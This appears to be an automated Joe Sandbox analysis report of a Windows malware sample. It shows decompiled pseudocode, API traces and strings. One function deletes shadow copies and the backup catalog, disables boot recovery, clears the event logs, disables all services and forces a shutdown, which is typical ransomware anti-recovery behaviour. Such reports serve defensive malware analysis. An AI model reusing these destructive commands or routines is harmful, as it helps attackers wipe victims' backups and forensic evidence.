				signed int _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t21;
				signed int _t29;
				signed int _t32;
				signed int _t36;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t21 =  *0x1001d018; // 0x26c1db24
				if(_t21 == 0xbb40e64e || (0xffff0000 & _t21) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = _v8 ^ GetCurrentProcessId();
					QueryPerformanceCounter( &_v24);
					_t29 =  &_v8;
					_t36 = _v20 ^ _v24.LowPart ^ _v8 ^ _t29;
					if(_t36 != 0xbb40e64e) {
						if((0xffff0000 & _t36) == 0) {
							_t29 = (_t36 | 0x00004711) << 0x10;
							_t36 = _t36 | _t29;
						}
					} else {
						_t36 = 0xbb40e64f;
					}
					 *0x1001d018 = _t36;
					 *0x1001d014 =  !_t36;
					return _t29;
				} else {
					_t32 =  !_t21;
					 *0x1001d014 = _t32;
					return _t32;
				}
			}











    0x100016c4
    0x100016c8
    0x100016cc
    0x100016df
    0x100016f2
    0x100016fe
    0x10001707
    0x10001710
    0x10001717
    0x10001720
    0x10001729
    0x1000172d
    0x10001738
    0x10001741
    0x10001744
    0x10001744
    0x1000172f
    0x1000172f
    0x1000172f
    0x10001746
    0x1000174e
    0x00000000
    0x100016e5
    0x100016e5
    0x100016e7
    0x00000000
    0x100016e7

    APIs
    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 100016F2
    • GetCurrentThreadId.KERNEL32 ref: 10001701
    • GetCurrentProcessId.KERNEL32 ref: 1000170A
    • QueryPerformanceCounter.KERNEL32(?), ref: 10001717
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    Function 100133A0, Relevance: 5.1, APIs: 4, Instructions: 127
    C-Code - Quality: 94%
    			E100133A0(intOrPtr* __ecx, char __edx, intOrPtr _a8) {
				void* _v8;
				signed short _v10;
				void* _v16;
				signed short _v18;
				char _v24;
				char _v28;
				intOrPtr _v32;
				void* _v36;
				intOrPtr _v40;
				char _v44;
				void* _v48;
				void* _v52;
				intOrPtr _v56;
				char _v60;
				void* _v64;
				void* _v68;
				char* _v72;
				void* _v76;
				char* _v80;
				void* _v84;
				intOrPtr _v88;
				char _v92;
				void* _v96;
				char _v100;
				void* _t56;
				void* _t58;
				char _t59;
				void* _t61;
				intOrPtr _t62;
				signed short _t65;
				void* _t67;
				void* _t69;
				signed short _t73;
				void* _t75;
				void* _t77;
				void* _t85;
				void* _t87;
				intOrPtr _t96;
				intOrPtr* _t98;
				signed int _t100;
				void* _t102;

				_t102 = (_t100 & 0xfffffff8) - 0x60;
				_v92 = 0;
				_v88 = 0x1001f2d0;
				_v100 = __edx;
				_t98 = __ecx;
				_t56 =  *__ecx;
				_v96 = _t56;
				if(__edx == 0) {
					L19:
					return _t56;
				} else {
					_t96 = _a8;
					do {
						_v92 =  &_v36;
						_t58 = E10014010( &_v92,  &_v100, 0xc);
						_t102 = _t102 + 4;
						if(_t58 == 0) {
							_t56 = _v100;
							goto L18;
						}
						_t59 = _v28;
						_v100 = _t59;
						if(_t59 == 0) {
							L16:
							_t56 = _v36;
							_v100 = _t56;
							goto L18;
						} else {
							goto L4;
						}
						do {
							L4:
							_v92 =  &_v24;
							_t61 = E10014010( &_v92,  &_v100, 0x14);
							_t102 = _t102 + 4;
							if(_t61 == 0) {
								goto L15;
							}
							_t85 = _v8;
							_v80 =  &_v68;
							_v100 = _t85;
							_v68 = 0;
							_v64 = 0;
							_v84 = 0;
							_v60 = _t85;
							_v56 =  *_t98;
							_v8 = 0;
							if(_t85 == 0) {
								goto L15;
							}
							_t65 = _v10;
							if(_t65 == 0) {
								goto L15;
							}
							_t67 = LocalAlloc(0x40, _t65 & 0x0000ffff);
							_v84 = _t67;
							if(_t67 == 0) {
								goto L15;
							}
							_v8 = _t67;
							_t69 = E10014010( &_v84,  &_v60, _v10 & 0x0000ffff);
							_t102 = _t102 + 4;
							if(_t69 == 0) {
								goto L15;
							}
							_t87 = _v16;
							_v72 =  &_v52;
							_v52 = 0;
							_v48 = 0;
							_v76 = 0;
							_v44 = _t87;
							_v40 =  *_t98;
							_v16 = 0;
							if(_t87 != 0) {
								_t73 = _v18;
								if(_t73 != 0) {
									_t75 = LocalAlloc(0x40, _t73 & 0x0000ffff);
									_v76 = _t75;
									if(_t75 != 0) {
										_v16 = _t75;
										_t77 = E10014010( &_v76,  &_v44, _v18 & 0x0000ffff);
										_t102 = _t102 + 4;
										if(_t77 != 0) {
											_push(_t96);
											_push( &_v100);
											_push(_v32);
											_push( &_v24);
											E10013580( &_v24, _t98);
											LocalFree(_v36);
										}
									}
								}
							}
							LocalFree(_v8);
							L15:
							_t62 = _v24;
							_v100 = _t62;
						} while (_t62 != 0);
						goto L16;
						L18:
					} while (_t56 != 0);
					goto L19;
				}
			}












































    0x100133a6
    0x100133a9
    0x100133b1
    0x100133b9
    0x100133bd
    0x100133c0
    0x100133c2
    0x100133c8
    0x10013574
    0x10013579
    0x100133ce
    0x100133ce
    0x100133d1
    0x100133db
    0x100133e3
    0x100133e8
    0x100133ed
    0x10013568
    0x00000000
    0x10013568
    0x100133f3
    0x100133f7
    0x100133fd
    0x1001355e
    0x1001355e
    0x10013562
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x10013403
    0x10013403
    0x1001340d
    0x10013415
    0x1001341a
    0x1001341f
    0x00000000
    0x00000000
    0x10013425
    0x1001342d
    0x10013433
    0x10013437
    0x1001343f
    0x10013447
    0x1001344f
    0x10013453
    0x10013457
    0x10013461
    0x00000000
    0x00000000
    0x10013467
    0x1001346f
    0x00000000
    0x00000000
    0x1001347b
    0x10013481
    0x10013487
    0x00000000
    0x00000000
    0x1001348d
    0x1001349f
    0x100134a4
    0x100134a9
    0x00000000
    0x00000000
    0x100134af
    0x100134b7
    0x100134bd
    0x100134c5
    0x100134cd
    0x100134d5
    0x100134d9
    0x100134dd
    0x100134e7
    0x100134e9
    0x100134f1
    0x100134f9
    0x100134ff
    0x10013505
    0x10013507
    0x10013519
    0x1001351e
    0x10013523
    0x10013525
    0x1001352a
    0x1001352b
    0x10013533
    0x10013535
    0x1001353e
    0x1001353e
    0x10013523
    0x10013505
    0x100134f1
    0x10013548
    0x1001354e
    0x1001354e
    0x10013552
    0x10013556
    0x00000000
    0x1001356c
    0x1001356c
    0x00000000
    0x100133d1

    APIs
      • Part of subcall function 10014010: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 10014059
      • Part of subcall function 10014010: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1001407C
      • Part of subcall function 10014010: WriteProcessMemory.KERNEL32(?,1001F2D0,?,?,00000000), ref: 100140A2
      • Part of subcall function 10014010: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,?,10014919,000CAA50), ref: 100140B9
      • Part of subcall function 10014010: LocalFree.KERNEL32(?,10012590), ref: 100140F3
      • Part of subcall function 10014010: SetFilePointer.KERNEL32(?,?,?,?), ref: 10014120
      • Part of subcall function 10014010: ReadFile.KERNEL32(?,1001F2D0,?,?,00000000), ref: 10014140
      • Part of subcall function 10014010: ReadProcessMemory.KERNELBASE(?,?,1001F2D0,?,00000000), ref: 1001415F
    • LocalAlloc.KERNEL32(00000040,?), ref: 1001347B
    • LocalAlloc.KERNEL32(00000040,?), ref: 100134F9
      • Part of subcall function 10013580: RtlEqualString.NTDLL(?,1001ADE8,00000000), ref: 10013597
      • Part of subcall function 10013580: RtlEqualString.NTDLL(?,1001A8F4,00000000), ref: 100135B0
    • LocalFree.KERNEL32(?,?,?,?,?,?), ref: 1001353E
    • LocalFree.KERNEL32(?), ref: 10013548
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd

    Analysis Process: _usm.exe PID: 3296 Parent PID: 3216

    Executed Functions

    Function 001412E8, Relevance: 36.9, APIs: 19, Strings: 2, Instructions: 126

    Control-flow Graph

    C-Code - Quality: 100%
    			E001412E8() {
				int _v8;
				int _v12;
				int _v16;
				struct _QUERY_SERVICE_CONFIG* _v20;
				void* _v24;
				short** _v28;
				short* _v32;
				void* _v36;
				int _v40;
				void* _v44;
				void* _t43;
				struct _ENUM_SERVICE_STATUS* _t46;
				void* _t53;
				void* _t57;

				_t43 = OpenSCManagerW(0, L"ServicesActive", 0x80000000); // executed
				_v36 = _t43;
				if(_t43 != 0) {
					_v8 = 0;
					_v16 = 0;
					_v40 = 0;
					EnumServicesStatusW(_t43, 0x13f, 3, 0, 0,  &_v8,  &_v16,  &_v40);
					_t46 = RtlAllocateHeap(GetProcessHeap(), 8, _v8); // executed
					_v44 = _t46;
					if(EnumServicesStatusW(_v36, 0x13f, 3, _t46, _v8,  &_v8,  &_v16,  &_v40) == 0) {
						L10:
						return CloseServiceHandle(_v36);
					}
					_v32 = 0;
					if(_v16 <= 0) {
						L9:
						HeapFree(GetProcessHeap(), 8, _v44);
						goto L10;
					}
					_v28 = _v44;
					do {
						_t53 = OpenServiceW(_v36,  *_v28, 0x10000000); // executed
						_v24 = _t53;
						if(_t53 != 0) {
							_v12 = 0;
							QueryServiceConfigW(_t53, 0, 0,  &_v12);
							_t57 = HeapAlloc(GetProcessHeap(), 8, _v12); // executed
							_v20 = _t57;
							ChangeServiceConfigW(_v24, 0xffffffff, 4, 0xffffffff, 0, 0, 0, 0, 0, 0, 0);
							if(QueryServiceConfigW(_v24, _v20, _v12,  &_v12) != 0) {
								PathRemoveArgsW( *(_v20 + 0xc));
							}
							HeapFree(GetProcessHeap(), 8, _v20);
							GetLastError();
							CloseServiceHandle(_v24);
						}
						_v32 = _v32 + 1;
						_v28 =  &(_v28[9]);
					} while (_v32 < _v16);
					goto L9;
				}
				return _t43;
			}

















    0x001412fc
    0x00141302
    0x00141307
    0x0014132b
    0x0014132e
    0x00141331
    0x00141334
    0x00141344
    0x00141359
    0x0014136b
    0x00141433
    0x00000000
    0x0014143d
    0x00141371
    0x00141377
    0x00141425
    0x0014142d
    0x00000000
    0x0014142d
    0x00141386
    0x00141389
    0x00141396
    0x0014139c
    0x001413a1
    0x001413aa
    0x001413ad
    0x001413b7
    0x001413cd
    0x001413d0
    0x001413e7
    0x001413ef
    0x001413ef
    0x001413fd
    0x00141403
    0x0014140c
    0x0014140c
    0x00141412
    0x00141418
    0x0014141c
    0x00000000
    0x00141389
    0x00141440

    APIs
    • OpenSCManagerW.SECHOST(00000000,ServicesActive,80000000), ref: 001412FC
    • EnumServicesStatusW.ADVAPI32(00000000,0000013F,00000003,00000000,00000000,?,?,?), ref: 00141334
    • GetProcessHeap.KERNEL32(00000008,?), ref: 00141341
    • RtlAllocateHeap.NTDLL(00000000), ref: 00141344
    • EnumServicesStatusW.ADVAPI32(?,0000013F,00000003,00000000,?,?,?,?), ref: 00141367
    • OpenServiceW.SECHOST(?,?,10000000), ref: 00141396
    • QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?), ref: 001413AD
    • GetProcessHeap.KERNEL32(00000008,?), ref: 001413B4
    • HeapAlloc.KERNEL32(00000000), ref: 001413B7
    • ChangeServiceConfigW.ADVAPI32(?,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001413D0
    • QueryServiceConfigW.ADVAPI32(?,?,?,?), ref: 001413E3
    • PathRemoveArgsW.SHLWAPI(?), ref: 001413EF
    • GetProcessHeap.KERNEL32(00000008,?), ref: 001413FA
    • HeapFree.KERNEL32(00000000), ref: 001413FD
    • GetLastError.KERNEL32 ref: 00141403
    • CloseServiceHandle.ADVAPI32(?), ref: 0014140C
    • GetProcessHeap.KERNEL32(00000008,?), ref: 0014142A
    • HeapFree.KERNEL32(00000000), ref: 0014142D
    • CloseServiceHandle.ADVAPI32(?), ref: 00141436
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    Function 001416E9, Relevance: 35.1, APIs: 10, Strings: 10, Instructions: 74threadsleepshutdown

    Control-flow Graph

    C-Code - Quality: 72%
    			E001416E9() {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				struct _TOKEN_PRIVILEGES _v24;
				char _v28;
				void* _v32;
				struct _LUID _v40;
				signed int _t15;
				void* _t33;
				void* _t40;
				signed int _t42;
				intOrPtr* _t43;

				_t15 =  *0x149004; // 0x20251455
				_v8 = _t15 ^ _t42;
				_v28 = 0;
				__imp__Wow64DisableWow64FsRedirection();
				LookupPrivilegeValueW(0, L"SeShutdownPrivilege",  &_v40); // executed
				_v24.Privileges = _v40.LowPart;
				_v24.PrivilegeCount = 1;
				_v16 = _v40.HighPart;
				_v12 = 2;
				OpenProcessToken(GetCurrentProcess(), 0x28,  &_v32);
				AdjustTokenPrivileges(_v32, 0,  &_v24, 0x10, 0, 0); // executed
				E00141000(L"c:\\Windows\\system32\\vssadmin.exe", L"delete shadows /all /quiet"); // executed
				 *_t43 = L"delete catalog -quiet"; // executed
				E00141000(L"wbadmin.exe",  &_v28); // executed
				 *_t43 = L"/set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no"; // executed
				E00141000(L"bcdedit.exe", _t40); // executed
				 *_t43 = L"cl System"; // executed
				E00141000(L"wevtutil.exe", _t33); // executed
				 *_t43 = L"cl Security"; // executed
				E00141000(L"wevtutil.exe"); // executed
				__imp__Wow64RevertWow64FsRedirection(_v28); // executed
				E001412E8(); // executed
				CreateThread(0, 0, E001416BF, 0, 0, 0); // executed
				Sleep(0x36ee80); // executed
				__imp__InitiateSystemShutdownExW(0, 0, 0, 1, 0, 0x50000); // executed
				ExitProcess(0);
			}















    0x001416ef
    0x001416f6
    0x00141701
    0x00141704
    0x00141714
    0x0014171d
    0x00141723
    0x0014172a
    0x0014172d
    0x00141741
    0x00141753
    0x00141763
    0x0014176d
    0x00141774
    0x0014177e
    0x00141785
    0x0014178f
    0x00141796
    0x0014179b
    0x001417a2
    0x001417ab
    0x001417b1
    0x001417c0
    0x001417cb
    0x001417dc
    0x001417e3

    APIs
    • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 00141704
    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00141714
    • GetCurrentProcess.KERNEL32 ref: 00141734
    • OpenProcessToken.ADVAPI32(00000000,00000028,?), ref: 00141741
    • AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000010,00000000,00000000), ref: 00141753
      • Part of subcall function 00141000: wsprintfW.USER32 ref: 00141072
      • Part of subcall function 00141000: GetSystemDirectoryW.KERNEL32(?,00000410), ref: 00141087
      • Part of subcall function 00141000: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 001410A9
      • Part of subcall function 00141000: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001410BB
      • Part of subcall function 00141000: CloseHandle.KERNEL32(?), ref: 001410CD
      • Part of subcall function 00141000: CloseHandle.KERNEL32(?), ref: 001410D5
    • Wow64RevertWow64FsRedirection.KERNEL32(?), ref: 001417AB
      • Part of subcall function 001412E8: OpenSCManagerW.SECHOST(00000000,ServicesActive,80000000), ref: 001412FC
      • Part of subcall function 001412E8: EnumServicesStatusW.ADVAPI32(00000000,0000013F,00000003,00000000,00000000,?,?,?), ref: 00141334
      • Part of subcall function 001412E8: GetProcessHeap.KERNEL32(00000008,?), ref: 00141341
      • Part of subcall function 001412E8: RtlAllocateHeap.NTDLL(00000000), ref: 00141344
      • Part of subcall function 001412E8: EnumServicesStatusW.ADVAPI32(?,0000013F,00000003,00000000,?,?,?,?), ref: 00141367
      • Part of subcall function 001412E8: OpenServiceW.SECHOST(?,?,10000000), ref: 00141396
      • Part of subcall function 001412E8: QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?), ref: 001413AD
      • Part of subcall function 001412E8: GetProcessHeap.KERNEL32(00000008,?), ref: 001413B4
      • Part of subcall function 001412E8: HeapAlloc.KERNEL32(00000000), ref: 001413B7
      • Part of subcall function 001412E8: ChangeServiceConfigW.ADVAPI32(?,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001413D0
      • Part of subcall function 001412E8: QueryServiceConfigW.ADVAPI32(?,?,?,?), ref: 001413E3
      • Part of subcall function 001412E8: PathRemoveArgsW.SHLWAPI(?), ref: 001413EF
      • Part of subcall function 001412E8: GetProcessHeap.KERNEL32(00000008,?), ref: 001413FA
      • Part of subcall function 001412E8: HeapFree.KERNEL32(00000000), ref: 001413FD
      • Part of subcall function 001412E8: GetLastError.KERNEL32 ref: 00141403
      • Part of subcall function 001412E8: CloseServiceHandle.ADVAPI32(?), ref: 0014140C
      • Part of subcall function 001412E8: GetProcessHeap.KERNEL32(00000008,?), ref: 0014142A
      • Part of subcall function 001412E8: HeapFree.KERNEL32(00000000), ref: 0014142D
      • Part of subcall function 001412E8: CloseServiceHandle.ADVAPI32(?), ref: 00141436
    • CreateThread.KERNEL32(00000000,00000000,Function_000016BF,00000000,00000000,00000000), ref: 001417C0
    • Sleep.KERNELBASE(0036EE80), ref: 001417CB
    • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000000,00050000), ref: 001417DC
    • ExitProcess.KERNEL32 ref: 001417E3
    Strings
    • wbadmin.exe, xrefs: 00141768
    • bcdedit.exe, xrefs: 00141779
    • delete shadows /all /quiet, xrefs: 00141759
    • delete catalog -quiet, xrefs: 0014176D
    • cl System, xrefs: 0014178F
    • /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no, xrefs: 0014177E
    • SeShutdownPrivilege, xrefs: 0014170E
    • wevtutil.exe, xrefs: 0014178A
    • c:\Windows\system32\vssadmin.exe, xrefs: 0014175E
    • cl Security, xrefs: 0014179B
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    Function 00142AE3, Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 109librarythread

    Control-flow Graph

    C-Code - Quality: 51%
    			E00142AE3(void* __ebx, void* __edx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t14;
				void* _t15;
				void* _t16;
				_Unknown_base(*)()* _t17;
				void* _t18;
				intOrPtr* _t20;
				intOrPtr _t21;
				intOrPtr* _t23;
				long _t26;
				void* _t30;
				void* _t35;
				struct HINSTANCE__* _t36;
				intOrPtr* _t37;
				void* _t40;
				intOrPtr* _t42;
				void* _t43;

				_t35 = __edx;
				_t30 = __ebx;
				_t36 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t36 != 0) {
					 *0x14a5b8 = GetProcAddress(_t36, "FlsAlloc");
					 *0x14a5bc = GetProcAddress(_t36, "FlsGetValue");
					 *0x14a5c0 = GetProcAddress(_t36, "FlsSetValue");
					_t7 = GetProcAddress(_t36, "FlsFree");
					__eflags =  *0x14a5b8;
					_t40 = TlsSetValue;
					 *0x14a5c4 = _t7;
					if( *0x14a5b8 == 0) {
						L6:
						 *0x14a5bc = TlsGetValue;
						 *0x14a5b8 = 0x1427f3;
						 *0x14a5c0 = _t40;
						 *0x14a5c4 = TlsFree;
					} else {
						__eflags =  *0x14a5bc;
						if( *0x14a5bc == 0) {
							goto L6;
						} else {
							__eflags =  *0x14a5c0;
							if( *0x14a5c0 == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					 *0x149054 = _t10;
					__eflags = _t10 - 0xffffffff;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x14a5bc);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E00141B44();
							_t42 = __imp__EncodePointer; // executed
							_t14 =  *_t42( *0x14a5b8); // executed
							 *0x14a5b8 = _t14; // executed
							_t15 =  *_t42( *0x14a5bc); // executed
							 *0x14a5bc = _t15; // executed
							_t16 =  *_t42( *0x14a5c0); // executed
							 *0x14a5c0 = _t16; // executed
							_t17 =  *_t42( *0x14a5c4); // executed
							 *0x14a5c4 = _t17;
							_t18 = E00142F5C();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E00142830();
								goto L15;
							} else {
								_t37 = __imp__DecodePointer;
								_t20 =  *_t37( *0x14a5b8, E001429B4); // executed
								_t21 =  *_t20();
								 *0x149050 = _t21;
								__eflags = _t21 - 0xffffffff;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t43 = E001444AD(1, 0x214);
									__eflags = _t43;
									if(_t43 == 0) {
										goto L14;
									} else {
										_t23 =  *_t37( *0x14a5c0,  *0x149050, _t43); // executed
										__eflags =  *_t23();
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t43);
											E0014286D(_t30, _t35, _t37, _t43, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t43 + 4) =  *(_t43 + 4) | 0xffffffff;
											 *_t43 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E00142830();
					return 0;
				}
			}

























    0x00142ae3
    0x00142ae3
    0x00142af1
    0x00142af5
    0x00142b15
    0x00142b22
    0x00142b2f
    0x00142b34
    0x00142b36
    0x00142b3d
    0x00142b43
    0x00142b48
    0x00142b60
    0x00142b65
    0x00142b6f
    0x00142b79
    0x00142b7f
    0x00142b4a
    0x00142b4a
    0x00142b51
    0x00000000
    0x00142b53
    0x00142b53
    0x00142b5a
    0x00000000
    0x00142b5c
    0x00142b5c
    0x00142b5e
    0x00000000
    0x00000000
    0x00142b5e
    0x00142b5a
    0x00142b51
    0x00142b84
    0x00142b8a
    0x00142b8f
    0x00142b92
    0x00142c59
    0x00142c59
    0x00142c59
    0x00142b98
    0x00142b9f
    0x00142ba1
    0x00142ba3
    0x00000000
    0x00142ba9
    0x00142ba9
    0x00142bb4
    0x00142bba
    0x00142bc2
    0x00142bc7
    0x00142bcf
    0x00142bd4
    0x00142bdc
    0x00142be1
    0x00142be3
    0x00142be8
    0x00142bed
    0x00142bef
    0x00142c54
    0x00142c54
    0x00000000
    0x00142bf1
    0x00142bf1
    0x00142c02
    0x00142c04
    0x00142c06
    0x00142c0b
    0x00142c0e
    0x00000000
    0x00142c10
    0x00142c1c
    0x00142c20
    0x00142c22
    0x00000000
    0x00142c24
    0x00142c31
    0x00142c35
    0x00142c37
    0x00000000
    0x00142c39
    0x00142c39
    0x00142c3b
    0x00142c3c
    0x00142c43
    0x00142c49
    0x00142c4d
    0x00142c51
    0x00142c51
    0x00142c37
    0x00142c22
    0x00142c0e
    0x00142bef
    0x00142ba3
    0x00142c5d
    0x00142af7
    0x00142af7
    0x00142aff
    0x00142aff

    APIs
    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,001418AC), ref: 00142AEB
    • GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,001418AC), ref: 00142B0D
    • GetProcAddress.KERNEL32(00000000,FlsGetValue,?,001418AC), ref: 00142B1A
    • GetProcAddress.KERNEL32(00000000,FlsSetValue,?,001418AC), ref: 00142B27
    • GetProcAddress.KERNEL32(00000000,FlsFree,?,001418AC), ref: 00142B34
    • TlsAlloc.KERNEL32(?,001418AC), ref: 00142B84
    • TlsSetValue.KERNEL32(00000000,?,001418AC), ref: 00142B9F
    • EncodePointer.KERNEL32(?,001418AC), ref: 00142BBA
    • EncodePointer.KERNEL32(?,001418AC), ref: 00142BC7
    • EncodePointer.KERNEL32(?,001418AC), ref: 00142BD4
    • EncodePointer.KERNEL32(?,001418AC), ref: 00142BE1
      • Part of subcall function 00142F5C: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0), ref: 00142F84
    • DecodePointer.KERNEL32(001429B4,?,001418AC), ref: 00142C02
      • Part of subcall function 001444AD: Sleep.KERNEL32(00000000), ref: 001444D5
    • DecodePointer.KERNEL32(00000000,?,001418AC), ref: 00142C31
      • Part of subcall function 0014286D: GetModuleHandleW.KERNEL32(KERNEL32.DLL,00147BE0,00000008,00142975,00000000,00000000,?,00141E3B,00000003), ref: 0014287E
      • Part of subcall function 0014286D: InterlockedIncrement.KERNEL32(00149320), ref: 001428BF
    • GetCurrentThreadId.KERNEL32(?,001418AC), ref: 00142C43
      • Part of subcall function 00142830: DecodePointer.KERNEL32(00000003,00142C59,?,001418AC), ref: 00142841
      • Part of subcall function 00142830: TlsFree.KERNEL32(00000007,00142C59,?,001418AC), ref: 0014285B
      • Part of subcall function 00142830: DeleteCriticalSection.KERNEL32(00000000,00000000,774FA0FD,?,00142C59,?,001418AC), ref: 00142FC3
      • Part of subcall function 00142830: DeleteCriticalSection.KERNEL32(00000007,774FA0FD,?,00142C59,?,001418AC), ref: 00142FED
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    Function 00141822, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 98

    Control-flow Graph

    C-Code - Quality: 51%
    			E00141822(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t22;
				void* _t26;
				intOrPtr _t28;
				void* _t29;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				void* _t45;
				signed int _t46;
				void* _t49;
				void* _t53;
				intOrPtr _t55;
				void* _t56;

				_t50 = __edi;
				_t49 = __edx;
				_t43 = __ebx;
				_push(0x58);
				_push(0x147ba0);
				E00142C80(__ebx, __edi, __esi);
				GetStartupInfoW(_t53 - 0x68);
				_t55 =  *0x14a8bc; // 0x0
				if(_t55 == 0) {
					__imp__HeapSetInformation(0, 1, 0, 0);
				}
				_t56 =  *0x140000 - 0x5a4d; // 0x5a4d
				if(_t56 == 0) {
					_t22 =  *0x14003c; // 0xe8
					__eflags =  *((intOrPtr*)(_t22 + 0x140000)) - 0x4550;
					if( *((intOrPtr*)(_t22 + 0x140000)) != 0x4550) {
						goto L3;
					} else {
						_t44 = 0x10b;
						__eflags =  *((intOrPtr*)(_t22 + 0x140018)) - 0x10b;
						if( *((intOrPtr*)(_t22 + 0x140018)) != 0x10b) {
							goto L3;
						} else {
							__eflags =  *((intOrPtr*)(_t22 + 0x140074)) - 0xe;
							if( *((intOrPtr*)(_t22 + 0x140074)) <= 0xe) {
								goto L3;
							} else {
								__eflags =  *(_t22 + 0x1400e8);
								_t8 =  *(_t22 + 0x1400e8) != 0;
								__eflags = _t8;
								_t44 = 0 | _t8;
								 *(_t53 - 0x1c) = _t8;
							}
						}
					}
				} else {
					L3:
					 *(_t53 - 0x1c) = 0;
				}
				if(E00142C5E() == 0) {
					E001417F9(0x1c);
					_pop(_t44);
				}
				if(E00142AE3(_t43, _t49) == 0) {
					E001417F9(0x10);
					_pop(_t44);
				}
				E0014279E();
				 *((intOrPtr*)(_t53 - 4)) = 0;
				_t26 = E00142559(); // executed
				_t59 = _t26;
				if(_t26 < 0) {
					E00141DBC(_t49, _t59);
					_t44 = 0x1b;
				}
				 *0x14a8b8 = GetCommandLineA(); // executed
				_t28 = E001424C2(); // executed
				 *0x149b20 = _t28;
				_t29 = E00142407(_t44);
				_t60 = _t29;
				if(_t29 < 0) {
					E00141DBC(_t49, _t60);
					_t44 = 8;
				}
				_t30 = E00142191(_t44, _t49, _t50);
				_t61 = _t30;
				if(_t30 < 0) {
					_push(9);
					E00141DBC(_t49, _t61);
				}
				_t31 = E00141B9B(_t50, 0, 1); // executed
				_pop(_t45);
				_t62 = _t31;
				if(_t31 != 0) {
					E00141DBC(_t49, _t62);
					_t45 = _t31;
